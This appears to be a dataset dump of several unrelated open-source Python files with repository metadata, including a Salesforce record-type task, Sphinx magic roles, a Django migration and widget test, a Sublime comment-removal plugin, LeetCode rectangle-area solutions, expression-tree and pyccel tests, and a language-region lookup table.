"LicenseRef-scancode-free-unknown"
] |
permissive
|
SFDO-Tooling/CumulusCI
|
32d4509fa8a36905cfc84fd6283403fd7f4b78c4
|
9ccf3c9566f78c6e9102ac214db30470cef660c1
|
refs/heads/main
| 2023-08-18T04:53:55.733027
| 2023-08-11T20:52:08
| 2023-08-11T20:52:08
| 15,592,459
| 226
| 134
|
BSD-3-Clause
| 2023-09-14T05:09:26
| 2014-01-02T20:01:31
|
Python
|
UTF-8
|
Python
| false
| false
| 542
|
py
|
recordtypes.py
|
from collections import defaultdict
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
class CheckSObjectRecordTypes(BaseSalesforceApiTask):
def _run_task(self):
rts = defaultdict(list)
records = self.tooling.query_all(
"Select SobjectType, FullName FROM RecordType"
)["records"]
for r in records:
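            # FullName combines the object and record type developer names
            # ("SObjectType.DeveloperName"), so keep only the part after the dot.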
rts[r["SobjectType"]].append(r["FullName"].split(".")[1])
self.return_values = rts
self.logger.info(f"Found existing Record Types: {self.return_values}")
|
b07c4a80f16f49af50bb4711fc10822145f55807
|
baa2c6f22ff563d417e34692bf3345077eb8fa5f
|
/docs/sphinxext/magics.py
|
d96b41c6e1736f86ee6467ddc2c257982437d1ac
|
[
"BSD-3-Clause"
] |
permissive
|
ipython/ipython
|
c42ea223b6e391bb7dd39888cb959d4d5d6b21a1
|
e5103f971233fd66b558585cce7a4f52a716cd56
|
refs/heads/main
| 2023-08-30T18:27:18.436521
| 2023-08-29T12:16:00
| 2023-08-29T12:16:00
| 658,518
| 13,673
| 4,729
|
BSD-3-Clause
| 2023-09-12T20:22:09
| 2010-05-10T04:46:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
magics.py
|
import re
from sphinx import addnodes
from sphinx.domains.std import StandardDomain
from sphinx.roles import XRefRole
name_re = re.compile(r"[\w_]+")
def parse_magic(env, sig, signode):
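    # 'sig' is the bare magic name (e.g. 'timeit'); the rendered signature gets a '%'
    # prefix while the object is indexed under the bare name returned below.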
m = name_re.match(sig)
if not m:
raise Exception("Invalid magic command: %s" % sig)
name = "%" + sig
signode += addnodes.desc_name(name, name)
return m.group(0)
class LineMagicRole(XRefRole):
"""Cross reference role displayed with a % prefix"""
prefix = "%"
def process_link(self, env, refnode, has_explicit_title, title, target):
if not has_explicit_title:
title = self.prefix + title.lstrip("%")
target = target.lstrip("%")
return title, target
def parse_cell_magic(env, sig, signode):
m = name_re.match(sig)
if not m:
raise ValueError("Invalid cell magic: %s" % sig)
name = "%%" + sig
signode += addnodes.desc_name(name, name)
return m.group(0)
class CellMagicRole(LineMagicRole):
"""Cross reference role displayed with a %% prefix"""
prefix = "%%"
def setup(app):
app.add_object_type('magic', 'magic', 'pair: %s; magic command', parse_magic)
app.add_role_to_domain('std', 'magic', LineMagicRole(), override=True)
app.add_object_type('cellmagic', 'cellmagic', 'pair: %s; cell magic', parse_cell_magic)
app.add_role_to_domain('std', 'cellmagic', CellMagicRole(), override=True)
metadata = {'parallel_read_safe': True, 'parallel_write_safe': True}
return metadata
|
07b5c2d4dbacacdb588b05c0ae29d121906e5be0
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/migrations/0050_workflow_rejected_to_needs_changes.py
|
e9ed8f54e5c836c86b79ec3201102d6edb00df93
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
0050_workflow_rejected_to_needs_changes.py
|
# Generated by Django 3.0.5 on 2020-05-20 10:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("wagtailcore", "0049_taskstate_finished_by"),
]
operations = [
migrations.RemoveConstraint(
model_name="workflowstate",
name="unique_in_progress_workflow",
),
migrations.AlterField(
model_name="workflowstate",
name="status",
field=models.CharField(
choices=[
("in_progress", "In progress"),
("approved", "Approved"),
("needs_changes", "Needs changes"),
("cancelled", "Cancelled"),
],
default="in_progress",
max_length=50,
verbose_name="status",
),
),
migrations.AddConstraint(
model_name="workflowstate",
constraint=models.UniqueConstraint(
condition=models.Q(status__in=("in_progress", "needs_changes")),
fields=("page",),
name="unique_in_progress_workflow",
),
),
]
|
7b8324e1e736592959894a25605a68c139373a0f
|
26e3d85a3b61219e13f794289ff2b70baa248f14
|
/tests/test_widget_selectdate.py
|
44e328632c81b71fd2d90b384c35ce2d3e88a5cb
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
viewflow/django-material
|
ac8dd10daa8352440845c767b07cafc7f7d09216
|
31b1ce5f6fecc10ba4c9babe4219fb7be97dbf93
|
refs/heads/master
| 2023-08-15T23:32:58.330321
| 2023-04-12T06:12:07
| 2023-04-12T06:12:40
| 29,337,344
| 2,818
| 570
|
BSD-3-Clause
| 2023-03-04T02:28:50
| 2015-01-16T07:17:33
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,766
|
py
|
test_widget_selectdate.py
|
import json
from django import forms
from django.test.utils import override_settings
from django_webtest import WebTest
from . import build_test_urls
try:
from django.forms.widgets import SelectDateWidget
except ImportError:
# django 1.8
from django.forms.extras import SelectDateWidget
class SelectForm(forms.Form):
test_field = forms.DateField(
widget=SelectDateWidget)
data_field = forms.BooleanField(required=False, widget=forms.HiddenInput, initial=True,
help_text='To produce non empty POST for empty test_field')
@override_settings(ROOT_URLCONF=__name__)
class Test(WebTest):
default_form = SelectForm
def test_default_usecase(self):
page = self.app.get(self.test_default_usecase.url)
self.assertIn('id="id_test_field_container"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field_year"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field_month"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field_day"', page.body.decode('utf-8'))
# self.assertIn('data-test="Test Attr"', page.body.decode('utf-8'))
form = page.form
self.assertIn('test_field_year', form.fields)
self.assertIn('test_field_month', form.fields)
self.assertIn('test_field_day', form.fields)
form['test_field_year'] = '2023'
form['test_field_month'] = '1'
form['test_field_day'] = '13'
response = json.loads(form.submit().body.decode('utf-8'))
self.assertIn('cleaned_data', response)
self.assertIn('test_field', response['cleaned_data'])
self.assertEqual('2023-01-13', response['cleaned_data']['test_field'])
urlpatterns = build_test_urls(Test)
|
31b970c064d6b1472956b054962f1db4f2749200
|
f9357dc6ebe6ae1af0b03a9afc5f765706b8d31f
|
/sublime去除注释.py
|
8d2867eeb3b56ab84aabaaaadca33675f54ab85f
|
[] |
no_license
|
cilame/any-whim
|
660acd966048655aa36886047fbc232539807881
|
1520accbe1506a133989a6c2be17572e7fb4693e
|
refs/heads/master
| 2023-08-17T05:10:56.348200
| 2023-08-13T16:45:11
| 2023-08-13T16:45:11
| 110,548,292
| 125
| 64
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 571
|
py
|
sublime去除注释.py
|
# Save the Python code below into the Packages/User directory
# (open the Packages directory via Preferences -> Browse Packages, then enter the User directory)
# and name the file remove_comments.py.
# To use it, open the console with Ctrl+` and enter the single command below:
# view.run_command('remove_comments')
import sublime_plugin
class RemoveCommentsCommand(sublime_plugin.TextCommand):
def run(self, edit):
comments = self.view.find_by_selector('comment')
for region in reversed(comments):
self.view.erase(edit, region)
|
8f2feace28e2d0403b738832787a5341d5a4fbff
|
15f0514701a78e12750f68ba09d68095172493ee
|
/Python3/223.py
|
71bc312c642851238195082f2acfb8bc37146d83
|
[
"MIT"
] |
permissive
|
strengthen/LeetCode
|
5e38c8c9d3e8f27109b9124ae17ef8a4139a1518
|
3ffa6dcbeb787a6128641402081a4ff70093bb61
|
refs/heads/master
| 2022-12-04T21:35:17.872212
| 2022-11-30T06:23:24
| 2022-11-30T06:23:24
| 155,958,163
| 936
| 365
|
MIT
| 2021-11-15T04:02:45
| 2018-11-03T06:47:38
| null |
UTF-8
|
Python
| false
| false
| 1,564
|
py
|
223.py
|
__________________________________________________________________________________________________
sample 40 ms submission
class Solution:
def computeArea(self, A: int, B: int, C: int, D: int, E: int, F: int, G: int, H: int) -> int:
area = (C-A)*(D-B) + (G-E)*(H-F)
Ai = Bi = Ci = Di = float('inf')
if A <= E <= C:
Ai, Ci = E, min(C, G)
elif E <= A <= G:
Ai, Ci = A, min(C, G)
if B <= F <= D:
Bi, Di = F, min(D, H)
elif F <= B <= H:
Bi, Di = B, min(D, H)
# print(area, Ai, Bi, Ci, Di)
if Ai != float('inf') and Bi != float('inf'):
return area-(Ci-Ai)*(Di-Bi)
return area
__________________________________________________________________________________________________
sample 13000 kb submission
class Solution:
def computeArea(self, A: int, B: int, C: int, D: int, E: int, F: int, G: int, H: int) -> int:
area1 = (D-B)*(C-A)
area2 = (H-F)*(G-E)
area_both = area1+area2
# now for intersection
top = min(D,H)
bottom = max(B,F)
left = max(A,E)
right = min(C,G)
height = top-bottom
width = right - left
if height >0 and width >0:
intersection_area = height*width
else:
intersection_area = 0
return area_both - intersection_area
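        # Worked example: A,B,C,D = -3,0,3,4 and E,F,G,H = 0,-1,9,2 gives
        # 24 + 27 - (3 * 2) = 45, since the rectangles overlap in a 3-by-2 region.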
__________________________________________________________________________________________________
|
a9c7f67fad4c4d48c3a005b2889e62e8d6d48db7
|
39164ede111f154b31cbb61663ea837f16f8aa4f
|
/odps/df/expr/tests/test_core.py
|
99156f55846b075c6e339e700f0bf746a082851f
|
[
"Apache-2.0"
] |
permissive
|
aliyun/aliyun-odps-python-sdk
|
217631252e6d52e75354a2a19faab5b9ff40e272
|
c5b897f03759b1a9851505eea3858a96d628f105
|
refs/heads/master
| 2023-08-16T22:42:12.441717
| 2023-07-19T06:28:25
| 2023-07-19T06:28:25
| 45,234,875
| 437
| 116
|
Apache-2.0
| 2023-08-03T06:45:34
| 2015-10-30T07:07:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,751
|
py
|
test_core.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2022 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..core import Node
class FakeNode(Node):
__slots__ = 'name',
_args = 'child1', 'child2', 'child3'
_cache_attrs = 'name',
def __str__(self):
return self.name
def test_nodes():
node1 = FakeNode(name='1')
node2 = FakeNode(name='2')
node3 = FakeNode(node1, name='3')
node4 = FakeNode(node3, node2, name='4')
node5 = FakeNode(node1, node4, name='5')
assert list(node5.traverse()) == [node1, node1, node3, node2, node4, node5]
assert list(node5.traverse(top_down=True)) == [node5, node1, node4, node3, node1, node2]
assert list(node5.traverse(unique=True)) == [node1, node3, node2, node4, node5]
assert list(node5.traverse(top_down=True, unique=True)) == [node5, node1, node4, node3, node2]
assert list(node5.leaves()) == [node1, node2]
node6 = FakeNode(node5, node3, name='6')
assert list(node6.traverse()) == [node1, node1, node3, node2, node4, node5, node3, node6]
assert list(node6.traverse(unique=True)) == [node1, node3, node2, node4, node5, node6]
node1_copy = FakeNode(name='1')
assert node1 == node1_copy
assert hash(node1) == hash(node1_copy)
node3_copy = FakeNode(node1_copy, name='3')
assert node3 == node3_copy
assert hash(node3) == hash(node3_copy)
assert node5.is_ancestor(node1) is True
assert node5.is_ancestor(node2) is True
assert node1.is_ancestor(node2) is False
assert [n.name for n in node5.path(node1)] == ['5', '1']
assert [n.name for n in node5.path(node2)] == ['5', '4', '2']
paths_node_5_1 = list(node5.all_path(node1))
assert len(paths_node_5_1) == 2
assert [int(n.name) for n in paths_node_5_1[0]] == [5, 1]
assert [int(n.name) for n in paths_node_5_1[1]] == [5, 4, 3, 1]
node6 = FakeNode(name='6')
node3.substitute(node1, node6)
assert list(node5.traverse()) == [node1, node6, node3, node2, node4, node5]
all_nodes = list(node5.traverse())
copy_nodes = list(node5.copy_tree().traverse())
assert len(all_nodes) == len(copy_nodes)
assert all(l is not r for l, r in zip(all_nodes, copy_nodes)) is True
|
9c1dfad5067f0da770c2592dff62ac60bef66444
|
e8b38b8dfa348ff006eb197a7906ca8e491a23dc
|
/tests/epyccel/test_epyccel_modules.py
|
963219e6d49ab023626ec0f047499c4e075c78b5
|
[
"MIT"
] |
permissive
|
pyccel/pyccel
|
d79a81dbdff1172839a6a1227abfcc1f97e6c97b
|
1896b761ba662c90b14c195bbb6eb5cddc57cbfc
|
refs/heads/devel
| 2023-08-30T12:15:25.244401
| 2023-08-28T09:31:32
| 2023-08-28T09:31:32
| 100,463,736
| 307
| 39
|
MIT
| 2023-09-14T19:29:26
| 2017-08-16T07:59:14
|
Python
|
UTF-8
|
Python
| false
| false
| 4,652
|
py
|
test_epyccel_modules.py
|
# pylint: disable=missing-function-docstring, missing-module-docstring
import numpy as np
from pyccel.epyccel import epyccel
RTOL = 2e-14
ATOL = 1e-15
def test_module_1(language):
import modules.Module_1 as mod
modnew = epyccel(mod, language=language)
from numpy import zeros
# ...
x_expected = zeros(5)
x = zeros(5)
mod.f(x_expected)
mod.g(x_expected)
modnew.f(x)
modnew.g(x)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
# ...
def test_local_module_1(language):
import Module_1 as mod
modnew = epyccel(mod, language=language)
from numpy import zeros
# ...
x_expected = zeros(5)
x = zeros(5)
mod.f(x_expected)
mod.g(x_expected)
modnew.f(x)
modnew.g(x)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
# ...
def test_module_2(language):
import modules.Module_2 as mod
modnew = epyccel(mod, language=language)
# ...
m1 = 2 ; m2 = 3
x = np.zeros((m1,m2))
modnew.f6(m1, m2, x)
x_expected = np.zeros((m1,m2))
mod.f6(m1, m2, x_expected)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
# ...
def test_module_3(language):
import modules.call_user_defined_funcs as mod
modnew = epyccel(mod, language=language)
r = 4.5
x_expected = mod.circle_volume(r)
x = modnew.circle_volume(r)
assert np.isclose( x, x_expected, rtol=RTOL, atol=ATOL )
i = np.random.randint(4,20)
n = np.random.randint(2,8)
arr = np.array(100*np.random.random_sample(n), dtype=int)
x_expected, y_expected = mod.alias(arr, i)
x, y = modnew.alias(arr, i)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
assert np.allclose( y, y_expected, rtol=RTOL, atol=ATOL )
assert x.dtype is x_expected.dtype
assert y.dtype is y_expected.dtype
def test_module_4(language):
import modules.Module_6 as mod
modnew = epyccel(mod, language=language)
n_x = np.random.randint(4,20)
n_y = np.random.randint(4,20)
x = np.empty(n_x, dtype=float)
y = np.random.random_sample(n_y)
x_pyc = x.copy()
y_pyc = y.copy()
max_pyt = mod.f(x,y)
max_pyc = modnew.f(x_pyc, y_pyc)
assert np.isclose( max_pyt, max_pyc, rtol=1e-14, atol=1e-14 )
assert np.allclose( x, x_pyc, rtol=1e-14, atol=1e-14 )
assert np.allclose( y, y_pyc, rtol=1e-14, atol=1e-14 )
def test_module_5(language):
import modules.Module_7 as mod
modnew = epyccel(mod, language=language)
max_pyt = mod.get_sum()
max_pyc = modnew.get_sum()
assert np.isclose( max_pyt, max_pyc, rtol=1e-14, atol=1e-14 )
max_pyt = mod.get_sum2()
max_pyc = modnew.get_sum2()
assert np.isclose( max_pyt, max_pyc, rtol=1e-14, atol=1e-14 )
def test_module_6(language):
import modules.consts as mod
modnew = epyccel(mod, language=language)
atts = ('g', 'R0', 'rMin', 'rMax', 'skip_centre',
'method', 'compl', 'tiny')
for att in atts:
mod_att = getattr(mod, att)
modnew_att = getattr(modnew, att)
assert mod_att == modnew_att
assert type(mod_att) is type(modnew_att)
def test_module_7(language):
import modules.array_consts as mod
modnew = epyccel(mod, language=language)
atts = ('a', 'b', 'c', 'd', 'e')
for att in atts:
mod_att = getattr(mod, att)
modnew_att = getattr(modnew, att)
assert np.array_equal(mod_att, modnew_att)
assert mod_att.dtype == modnew_att.dtype
assert np.array_equal(mod.F, modnew.F)
modnew.update_a()
mod.update_a()
mod_att = mod.a
modnew_att = modnew.a
assert np.array_equal(mod_att, modnew_att)
assert mod_att.dtype == modnew_att.dtype
mod.a[3] = 10
modnew.a[3] = 10
assert np.array_equal(mod_att, modnew_att)
assert mod.get_elem_a(3) == modnew.get_elem_a(3)
mod.c[1,0] = 10
modnew.c[1,0] = 10
assert np.array_equal(mod.c, modnew.c)
assert mod.get_elem_c(1,0) == modnew.get_elem_c(1,0)
mod.e[1,0,2] = 50
modnew.e[1,0,2] = 50
assert np.array_equal(mod.e, modnew.e)
assert mod.get_elem_e(1,0,2) == modnew.get_elem_e(1,0,2)
# Necessary as python does not reload modules
mod.reset_a()
mod.reset_c()
mod.reset_e()
def test_awkward_names(language):
import modules.awkward_names as mod
modnew = epyccel(mod, language=language)
assert mod.awkward_names == modnew.awkward_names
assert mod.a == modnew.a
assert mod.A == modnew.A
assert mod.function() == modnew.function()
assert mod.pure() == modnew.pure()
assert mod.allocate(1) == modnew.allocate(1)
|
1c1c5fa5376db3c640f15bcdf01b2c6a8ce8741f
|
95740c67e49e1528919eb8f96ae8086e7386e558
|
/project/reports/election_prediction/pattern/web/locale/__init__.py
|
9705b9891273f1a1f6177de8de421d02f06909b1
|
[
"MIT"
] |
permissive
|
mdeff/ntds_2016
|
5449fd5b7a1e4aa8721d0ae33a1f8a097f73b265
|
2d597838cb2688471cc6122a5570441585393148
|
refs/heads/master
| 2021-01-17T17:47:01.434340
| 2019-12-16T17:53:04
| 2019-12-16T17:53:04
| 69,178,943
| 109
| 51
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,710
|
py
|
__init__.py
|
#### PATTERN | WEB | LOCALE ########################################################################
# -*- coding: utf-8 -*-
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
#### LANGUAGE & REGION #############################################################################
# IETF BCP 47 language-region code => (language, region, ISO-639 language code, ISO-3166 region code).
# Note: the list is incomplete (especially for African languages).
# Please help out by correcting errors and omissions.
LANGUAGE_REGION = {
u'aa-ET': (u'Afar', u'Ethiopia', u'aa', u'ET'),
u'af-ZA': (u'Afrikaans', u'South Africa', u'af', u'ZA'),
u'ar-AE': (u'Arabic', u'United Arab Emirates', u'ar', u'AE'),
u'ar-BH': (u'Arabic', u'Bahrain', u'ar', u'BH'),
u'ar-DZ': (u'Arabic', u'Algeria', u'ar', u'DZ'),
u'ar-EG': (u'Arabic', u'Egypt', u'ar', u'EG'),
u'ar-IQ': (u'Arabic', u'Iraq', u'ar', u'IQ'),
u'ar-JO': (u'Arabic', u'Jordan', u'ar', u'JO'),
u'ar-KW': (u'Arabic', u'Kuwait', u'ar', u'KW'),
u'ar-LB': (u'Arabic', u'Lebanon', u'ar', u'LB'),
u'ar-LY': (u'Arabic', u'Libya', u'ar', u'LY'),
u'ar-MA': (u'Arabic', u'Morocco', u'ar', u'MA'),
u'ar-OM': (u'Arabic', u'Oman', u'ar', u'OM'),
u'ar-QA': (u'Arabic', u'Qatar', u'ar', u'QA'),
u'ar-SA': (u'Arabic', u'Saudi Arabia', u'ar', u'SA'),
u'ar-SD': (u'Arabic', u'Sudan', u'ar', u'SD'),
u'ar-SY': (u'Arabic', u'Syria', u'ar', u'SY'),
u'ar-TN': (u'Arabic', u'Tunisia', u'ar', u'TN'),
u'ar-YE': (u'Arabic', u'Yemen', u'ar', u'YE'),
u'be-BY': (u'Belarusian', u'Belarus', u'be', u'BY'),
u'bg-BG': (u'Bulgarian', u'Bulgaria', u'bg', u'BG'),
u'ca-AD': (u'Catalan', u'Andorra', u'ca', u'AD'),
u'cs-CZ': (u'Czech', u'Czech Republic', u'cs', u'CZ'),
u'da-DK': (u'Danish', u'Denmark', u'da', u'DK'),
u'de-DE': (u'German', u'Germany', u'de', u'DE'),
u'de-AT': (u'German', u'Austria', u'de', u'AT'),
u'de-CH': (u'German', u'Switzerland', u'de', u'CH'),
u'de-LI': (u'German', u'Liechtenstein', u'de', u'LI'),
u'de-LU': (u'German', u'Luxembourg', u'de', u'LU'),
u'el-GR': (u'Greek', u'Greece', u'el', u'GR'),
u'en-AU': (u'English', u'Australia', u'en', u'AU'),
u'en-BZ': (u'English', u'Belize', u'en', u'BZ'),
u'en-CA': (u'English', u'Canada', u'en', u'CA'),
u'en-GB': (u'English', u'United Kingdom', u'en', u'GB'),
u'en-IE': (u'English', u'Ireland', u'en', u'IE'),
u'en-JM': (u'English', u'Jamaica', u'en', u'JM'),
u'en-KE': (u'English', u'Kenya', u'en', u'KE'),
u'en-NZ': (u'English', u'New Zealand', u'en', u'NZ'),
u'en-TT': (u'English', u'Trinidad', u'en', u'TT'),
u'en-US': (u'English', u'United States', u'en', u'US'),
u'en-ZA': (u'English', u'South Africa', u'en', u'ZA'),
u'es-ES': (u'Spanish', u'Spain', u'es', u'ES'),
    u'es-AR': (u'Spanish', u'Argentina', u'es', u'AR'),
u'es-BO': (u'Spanish', u'Bolivia', u'es', u'BO'),
u'es-CL': (u'Spanish', u'Chile', u'es', u'CL'),
u'es-CO': (u'Spanish', u'Colombia', u'es', u'CO'),
u'es-CR': (u'Spanish', u'Costa Rica', u'es', u'CR'),
u'es-DO': (u'Spanish', u'Dominican Republic', u'es', u'DO'),
u'es-EC': (u'Spanish', u'Ecuador', u'es', u'EC'),
u'es-GT': (u'Spanish', u'Guatemala', u'es', u'GT'),
u'es-HN': (u'Spanish', u'Honduras', u'es', u'HN'),
u'es-MX': (u'Spanish', u'Mexico', u'es', u'MX'),
u'es-NI': (u'Spanish', u'Nicaragua', u'es', u'NI'),
u'es-PA': (u'Spanish', u'Panama', u'es', u'PA'),
u'es-PE': (u'Spanish', u'Peru', u'es', u'PE'),
u'es-PR': (u'Spanish', u'Puerto Rico', u'es', u'PR'),
u'es-PY': (u'Spanish', u'Paraguay', u'es', u'PY'),
u'es-SV': (u'Spanish', u'El Salvador', u'es', u'SV'),
u'es-UY': (u'Spanish', u'Uruguay', u'es', u'UY'),
u'es-VE': (u'Spanish', u'Venezuela', u'es', u'VE'),
u'et-EE': (u'Estonian', u'Estonia', u'et', u'EE'),
u'eu-PV': (u'Basque', u'Basque Country', u'eu', u'PV'),
u'fa-IR': (u'Farsi', u'Iran', u'fa', u'IR'),
u'fi-FI': (u'Finnish', u'Finland', u'fi', u'FI'),
u'fo-FO': (u'Faeroese', u'Faroe Islands', u'fo', u'FO'),
u'fr-CG': (u'French', u'Congo', u'fr', u'CG'),
u'fr-FR': (u'French', u'France', u'fr', u'FR'),
u'fr-BE': (u'French', u'Belgium', u'fr', u'BE'),
u'fr-CA': (u'French', u'Canada', u'fr', u'CA'),
u'fr-CH': (u'French', u'Switzerland', u'fr', u'CH'),
u'fr-LU': (u'French', u'Luxembourg', u'fr', u'LU'),
u'ga-IE': (u'Irish' , u'Ireland', u'ga', u'IE'),
u'gd-UK': (u'Gaelic', u'Scotland', u'gd', u'UK'),
    u'he-IL': (u'Hebrew', u'Israel', u'he', u'IL'),
u'hi-IN': (u'Hindi', u'India', u'hi', u'IN'),
u'hr-HR': (u'Croatian', u'Croatia', u'hr', u'HR'),
u'hu-HU': (u'Hungarian', u'Hungary', u'hu', u'HU'),
u'id-ID': (u'Indonesian', u'Indonesia', u'id', u'ID'),
u'is-IS': (u'Icelandic', u'Iceland', u'is', u'IS'),
u'it-IT': (u'Italian', u'Italy', u'it', u'IT'),
u'it-CH': (u'Italian', u'Switzerland', u'it', u'CH'),
u'ja-JA': (u'Japanese', u'Japan', u'ja', u'JA'),
u'ka-GE': (u'Georgian', u'Georgia', u'ka', u'GE'),
u'kg-CG': (u'Kongo', u'Congo', u'kg', u'CG'),
u'kl-GL': (u'Kalaallisut', u'Greenland', u'kl', u'GL'),
u'ko-KP': (u'Korean', u'Johab', u'ko', u'KP'),
u'ln-CG': (u'Lingala', u'Congo', u'ln', u'CG'),
u'lo-LA': (u'Lao', u'Lao', u'lo', u'LA'),
u'lt-LT': (u'Lithuanian', u'Lithuania', u'lt', u'LT'),
u'lv-LV': (u'Latvian', u'Latvia', u'lv', u'LV'),
    u'mk-MK': (u'Macedonian', u'Macedonia', u'mk', u'MK'),
u'ms-MY': (u'Malaysian', u'Malaysia', u'ms', u'MY'),
u'mt-MT': (u'Maltese', u'Malta', u'mt', u'MT'),
u'nd-ZW': (u'Ndebele', u'Zimbabwe', u'nd', u'ZW'),
u'nl-NL': (u'Dutch', u'Netherlands', u'nl', u'NL'),
u'nl-BE': (u'Dutch', u'Belgium', u'nl', u'BE'),
u'no-NO': (u'Norwegian', u'Nynorsk', u'no', u'NO'),
u'om-ET': (u'Oromo', u'Ethiopia', u'om', u'ET'),
u'om-KE': (u'Oromo', u'Kenya', u'om', u'KE'),
u'pl-PL': (u'Polish', u'Poland', u'pl', u'PL'),
    u'pt-MZ': (u'Portuguese', u'Mozambique', u'pt', u'MZ'),
u'pt-PT': (u'Portuguese', u'Portugal', u'pt', u'PT'),
u'pt-BR': (u'Portuguese', u'Brazil', u'pt', u'BR'),
u'rm-IT': (u'Rhaeto-Romanic', u'Italy', u'rm', u'IT'),
u'ro-RO': (u'Romanian', u'Romania', u'ro', u'RO'),
u'ro-MO': (u'Romanian', u'Republic of Moldova', u'ro', u'MO'),
u'ru-RU': (u'Russian', u'Russia', u'ru', u'RU'),
u'rw-RW': (u'Kinyarwanda', u'Rwanda', u'rw', u'RW'),
u'sk-SK': (u'Slovak', u'Slovakia', u'sk', u'SK'),
u'sl-SI': (u'Slovenian', u'Slovenia', u'sl', u'SI'),
    u'sm-SM': (u'Samoan', u'Samoa', u'sm', u'SM'),
u'so-KE': (u'Somali', u'Kenya', u'so', u'KE'),
u'so-SO': (u'Somali', u'Somalia', u'so', u'SO'),
u'sq-AL': (u'Albanian', u'Albania', u'sq', u'AL'),
u'sr-RS': (u'Serbian', u'Serbia', u'sr', u'RS'),
u'sv-SE': (u'Swedish', u'Sweden', u'sv', u'SE'),
    u'sw-KE': (u'Swahili', u'Kenya', u'sw', u'KE'),
u'sw-TZ': (u'Swahili', u'Tanzania', u'sw', u'TZ'),
u'sv-FI': (u'Swedish', u'Finland', u'sv', u'FI'),
u'sx-ZA': (u'Sotho', u'South Africa', u'sx', u'ZA'),
u'sz-FI': (u'Sami', u'Sapmi', u'sz', u'FI'),
u'th-TH': (u'Thai', u'Thailand', u'th', u'TH'),
u'tn-BW': (u'Tswana', u'Botswana', u'tn', u'BW'),
u'to-TO': (u'Tonga', u'Tonga', u'to', u'TO'),
u'tr-TR': (u'Turkish', u'Turkey', u'tr', u'TR'),
u'ts-ZA': (u'Tsonga', u'South Africa', u'ts', u'ZA'),
u'uk-UA': (u'Ukrainian', u'Ukraine', u'uk', u'UA'),
u'ur-PK': (u'Urdu', u'Pakistan', u'ur', u'PK'),
u'uz-UZ': (u'Uzbek', u'Uzbekistan', u'uz', u'UZ'),
u've-ZA': (u'Venda', u'South Africa', u've', u'ZA'),
u'vi-VN': (u'Vietnamese', u'Vietnam', u'vi', u'VN'),
u'xh-ZA': (u'Xhosa', u'South Africa', u'xh', u'ZA'),
u'zh-CN': (u'Chinese', u'China', u'zh', u'CN'),
u'zh-HK': (u'Chinese', u'Hong Kong', u'zh', u'HK'),
u'zh-SG': (u'Chinese', u'Singapore', u'zh', u'SG'),
u'zh-TW': (u'Chinese', u'Taiwan', u'zh', u'TW'),
u'zu-ZA': (u'Zulu', u'South Africa', u'zu', u'ZA'),
u'zu-ZW': (u'Zulu', u'Zimbabwe', u'zu', u'ZW')
}
def encode_language(name):
""" Returns the language code for the given language name.
For example: encode_language("dutch") => "nl".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if language == name.capitalize():
return iso639
def decode_language(code):
""" Returns the language name for the given language code.
For example: decode_language("nl") => "Dutch".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso639 == code.lower():
return language
def encode_region(name):
""" Returns the region code for the given region name.
For example: encode_region("belgium") => "BE".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if region == name.capitalize():
return iso3166
def decode_region(code):
""" Returns the region name for the given region code.
For example: decode_region("be") => "Belgium".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso3166 == code.upper():
return region
def languages(region):
""" Returns a list of language codes for the given region code.
For example: languages(encode_region("belgium")) => ["fr", "nl"]
"""
v, a = region.upper(), []
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso3166 == v:
a.append(iso639)
return sorted(a)
def regions(language):
""" Returns a list of region codes for the given language code.
For example: regions(encode_language("dutch")) => ["NL", "BE"]
"""
x, a = language.lower(), []
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso639 == x:
a.append(iso3166)
return sorted(a, key=lambda tag: tag.lower() != x and tag or "")
def regionalize(language):
""" Returns a list of RFC-5646 language-region codes for the given language code.
For example: regionalize("nl") => ["nl-NL", "nl-BE"]
"""
if not isinstance(language, basestring):
return []
if "-" in language:
language, region = language.split("-")
return [language.lower() + "-" + region.upper()] # nl-nl => nl-NL
